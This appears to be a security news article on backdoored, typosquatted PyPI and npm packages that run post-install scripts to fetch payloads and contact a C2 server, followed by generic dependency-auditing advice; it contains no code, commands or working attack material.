In a new wave of supply chain attacks, security researchers have uncovered multiple backdoored open-source packages uploaded to PyPI (Python Package Index) and npm (Node Package Manager).
These packages are designed to target both Windows and Linux environments and have been carefully crafted to blend in with legitimate development tools. The discovery comes just as Microsoft pushes for centralized software updates across Windows devices—a move we recently explored here.
What Was Discovered?
According to a report by ReversingLabs, at least five malicious packages were found on PyPI and three on npm. These libraries contained stealthy backdoors capable of remote code execution, data exfiltration, and additional malware deployment. The attackers disguised the packages with names that closely resembled legitimate libraries, increasing the likelihood that developers would unknowingly install them.
Notably, these malicious packages were cross-platform, using specific code branches for Windows and Linux, demonstrating a higher level of sophistication compared to typical open-source threats.
How Do the Backdoors Work?
Once installed, the packages initiate a post-installation script that downloads a second-stage payload. This payload:
- Establishes communication with a remote command-and-control (C2) server
- Waits for instructions to execute arbitrary commands
- Can download further malicious modules or steal sensitive data
The attackers used obfuscation techniques to hide the malicious code, and in some cases, delayed the execution to avoid detection during initial analysis.
A Growing Threat in the Software Supply Chain
This is not an isolated incident. The frequency of backdoored packages in open-source repositories has been increasing, raising alarms about the security of the software supply chain. Because developers often trust and rely on these repositories, a single compromised package can have far-reaching consequences, especially in enterprise environments.
Who Is Affected?
Developers and organizations using Python and Node.js should immediately audit their dependencies. Even if a backdoored package was only installed briefly, it could have introduced persistent threats into your environment.
The specific package names and hashes have been published by ReversingLabs, and the malicious libraries have since been removed. However, those who installed them before takedown may still be at risk.
What Can You Do?
- Audit your dependencies regularly: Use tools like
pip-audit,npm audit, or SBOM (Software Bill of Materials) generators to scan for known threats. - Pin versions and verify sources: Always verify the source of packages and avoid relying solely on name similarity.
- Monitor unusual activity: Keep an eye out for unexpected network requests, particularly to unfamiliar IP addresses or domains.
Final Thoughts
This incident reinforces the importance of securing every link in the development pipeline. From open-source repositories to update mechanisms, vigilance is essential. As companies like Microsoft work to unify and secure update processes, developers and organizations must do their part by practicing rigorous dependency hygiene.
For further technical analysis and details, read the full report on HackRead.